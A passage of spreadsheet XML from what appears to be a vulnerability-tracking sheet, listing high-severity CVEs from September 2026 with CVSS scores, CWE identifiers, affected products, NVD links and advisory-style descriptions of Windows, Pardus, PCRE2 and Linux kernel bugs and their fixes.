      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82007</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr"/>
      <c r="Q343" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R343"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S343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8301</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr"/>
      <c r="Q344" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Boot Repair allows OS Command Injection.
This issue affects Pardus Boot Repair: before 1.0.8.</t>
        </is>
      </c>
      <c r="S344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8301</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8303</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr"/>
      <c r="Q345" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>Incorrect privilege assignment vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus-software allows Privilege Escalation.
This issue affects Pardus-software: before 1.0.5.</t>
        </is>
      </c>
      <c r="S345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8303</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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46" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr"/>
      <c r="Q346" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr"/>
      <c r="Q347" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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8" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr"/>
      <c r="Q348" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89161</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr"/>
      <c r="Q349" s="5" t="inlineStr">
        <is>
          <t>CWE-590</t>
        </is>
      </c>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>In PCRE2 before 10.48, pcre2_jit_match mishandles a previously copied subject being passed in as a context. An incorrect free operation can occur.</t>
        </is>
      </c>
      <c r="S349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89161</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89436</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr"/>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: panasonic-laptop: Fix sentinel write past pcc-&gt;sinf[]
acpi_pcc_retrieve_biosdata() rejects SINF packages only when
pcc-&gt;num_sifr is strictly less than hkey-&gt;package.count, then
unconditionally writes a trailing sentinel at
pcc-&gt;sinf[hkey-&gt;package.count]. But pcc-&gt;sinf[] is allocated with
exactly pcc-&gt;num_sifr elements (valid indices 0..num_sifr-1), so that
write needs num_sifr strictly greater than package.count to stay in
bounds -- num_sifr == package.count passes the existing check but
still overflows by one element.
This is exactly the case probe()'s existing num_sifr++ workaround
("Some DSDT-s have an off-by-one bug where the SINF package count is
one higher than the SQTY reported value") is written to accommodate:
when a DSDT's SINF package count equals SQTY+1, the workaround makes
num_sifr equal to package.count, which is precisely the boundary that
overflows here. Found via UBSan (array-index-out-of-bounds) on
hardware where HKEY.SQTY returns 37 and HKEY.SINF()'s package has 38
elements: num_sifr becomes 38 after the += 1 workaround, the loop
correctly fills indices 0..37, and the sentinel write then targets
index 38, one past the end -- a silent 4-byte heap overflow on kernels
without CONFIG_UBSAN.
Tightening the rejection check to num_sifr &lt;= package.count would
avoid the overflow but breaks probe() entirely on exactly this
hardware, since num_sifr == package.count is the case the off-by-one
workaround exists to support. Nothing else in the driver reads this
sentinel value back, so simply skip the write when there is no room
for it instead.</t>
        </is>
      </c>
      <c r="S350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89436</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89440</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr"/>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mmc: via-sdmmc: stop card-detect handling on probe failure
request_irq() registers the SD card-detect interrupt and the probe enables
it before mmc_add_host() runs. If mmc_add_host() fails, the error path only
unmaps the registers and returns: the interrupt stays registered, so the
handler keeps running against the host once it is freed. via_sdc_isr()
dereferences sdhost and its MMIO base and schedules carddet_work, which
via_sdc_card_detect() also runs against freed memory through its
container_of() dereference.
Add a probe-error path that disables and frees the interrupt and cancels
carddet_work before unmapping. carddet_work can re-enable the device
interrupt via via_reset_pcictrl(), which restores PCIINTCTRL, so mask it
again after cancelling the work.
This issue was found by an in-house static analysis tool and confirmed by
manual code review.</t>
        </is>
      </c>
      <c r="S351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89440</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89441</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr"/>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mmc: via-sdmmc: cancel card-detect work on remove
Disabling the device interrupt and freeing the IRQ prevents new card-detect
work from being queued, but carddet_work already queued by the handler can
still run after via_sd_remove() returns. via_sdc_card_detect() recovers the
host through container_of() and dereferences its MMIO base; once remove()
returns the host can be freed, so that work would touch freed memory.
Cancel carddet_work after freeing the IRQ and before cancelling
finish_bh_work, which the card-detect handler can also queue. carddet_work
can re-enable the interrupt through via_reset_pcictrl(); mask it again
afterwards.
This issue was found by an in-house static analysis tool and confirmed by
manual code review.</t>
        </is>
      </c>
      <c r="S352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89441</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89442</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr"/>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: ISST: Validate socket ID in clos_assoc ioctl
isst_if_clos_assoc() validates the user-supplied socket_id with
'socket_id &gt; topology_max_packages()', but isst_common.sst_inst[] is
allocated with topology_max_packages() entries, so the valid index range
is [0, topology_max_packages()).  The '&gt;' comparison lets
socket_id == topology_max_packages() pass and index one entry past the
array.
In addition, isst_common.sst_inst[socket_id] is NULL for an in-range
package that has no bound TPMI SST instance, and the pointer is used
without a NULL check.  Both the out-of-bounds entry and the NULL pointer
are then dereferenced by map_partition_power_domain_id() and the
following power_domain_info access.
Reject socket_id &gt;= topology_max_packages() and a NULL sst_inst, matching
the checks already performed by get_instance().</t>
        </is>
      </c>
      <c r="S353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89442</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89472</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr"/>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: charger-manager: register regulators before exposing sysfs
charger_manager_remove() and the err_reg_extcon probe error path free each
charger regulator with regulator_put() before tearing down the power_supply
sysfs entries (power_supply_unregister()). charger_manager_remove() also
calls try_charger_enable(cm, false) after the regulator_put() loop. A
concurrent write to a charger's externally_control sysfs attribute that
lands between regulator_put() and power_supply_unregister() can run
charger_externally_control_store() and call try_charger_enable(), which,
when charging is enabled, dereferences the already-freed consumer handle.
When charging is enabled, try_charger_enable(cm, false) in .remove() also
dereferences the freed handles directly. Both leave use-after-free windows.
Symmetrically, probe registers the sysfs entries (power_supply_register)
before acquiring the regulators (regulator_get, inside
charger_manager_register_extcon), so userspace can reach externally_control
before the regulators are available.
Split charger_manager_register_extcon() on the sync/async boundary:
charger_manager_get_regulators() (regulator_get only, no async producer)
now runs before power_supply_register() so sysfs is not live before
regulators are available, and charger_manager_register_extcon() keeps only
the extcon notifier/work setup, still after power_supply_register() so a
power_supply_register() failure cannot reach extcon setup. This keeps the
sysfs setup/teardown ordering symmetric without introducing an asynchronous
producer on the earlier probe-error path.
Move power_supply_unregister() and try_charger_enable(cm, false) ahead of
the regulator_put() loop on both teardown paths, and adjust err_reg_extcon
(power_supply_unregister() then fall through err_regulator for
regulator_put(); get_regulators self-rolls back on its own failure).
This does not address the separate extcon-notifier-driven deref of the same
handles, which needs its own synchronization design.
Found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89472</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89486</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr"/>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmi: Fix use-after-free of cmd_rcvr in _ipmi_destroy_user()
Commit 9e91f8a6c868 ("ipmi:msghandler: Remove srcu for the
ipmi_interfaces list") dropped the synchronize_rcu() between unlinking
the command receivers from intf-&gt;cmd_rcvrs and freeing them, updating
only the comment that explains why the barrier is needed.
The cmd_rcvrs list is still traversed under plain RCU: find_cmd_rcvr()
walks it inside rcu_read_lock(), and handle_ipmb_get_msg_cmd() borrows
rcvr-&gt;user from that lookup within the same read-side section. Without
the grace period, _ipmi_destroy_user() can kfree() a cmd_rcvr while a
reader still holds a pointer to it, causing a use-after-free.
The rework only made srcu unnecessary for the interfaces list; the
cmd_rcvrs list still relies on plain RCU. Restore the synchronize_rcu()
before freeing the receivers.</t>
        </is>
      </c>
      <c r="S355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89486</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89487</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr"/>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
openvswitch: only skb_tx_error() a packet we are about to drop
queue_userspace_packet() borrows the packet skb -- it only copies it into
a private netlink message (user_skb) and does not own it; on return
do_execute_actions() keeps forwarding it through the flow's remaining
actions. Its error path nevertheless calls skb_tx_error(skb), which via
skb_zcopy_clear() does skb_shinfo(skb)-&gt;flags &amp;= ~SKBFL_ALL_ZEROCOPY,
stripping SKBFL_SHARED_FRAG from that live skb (skb_tx_error()'s kerneldoc
says "skb must be freed afterwards").
For a MSG_ZEROCOPY skb carrying page-cache frags, SKBFL_SHARED_FRAG is
what makes esp_input() skb_cow_data() before in-place AEAD; once it is
stripped a later local ESP-in-UDP delivery decrypts in place over pages
the sender does not own -- an unprivileged page-cache write (the
"Fragnesia" primitive).
do_execute_actions() ignores output_userspace()'s return value, so any
action after a failed USERSPACE upcall inherits the stripped skb.
Move the skb_tx_error() to the flow-miss drop path - the "default"
branch of ovs_dp_process_packet()'s switch(error), before kfree_skb().
The call has been here since commit 36d5fe6a0007 ("core, nfqueue,
openvswitch: Orphan frags in skb_zerocopy and handle errors") but was
harmless until esp_input() began relying on SKBFL_SHARED_FRAG to gate
in-place decrypt; only then did stripping it on a still-forwarded skb
become a page-cache write primitive.</t>
        </is>
      </c>
      <c r="S356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89487</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89488</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr"/>
      <c r="Q357" s="5" t="inlineStr"/>
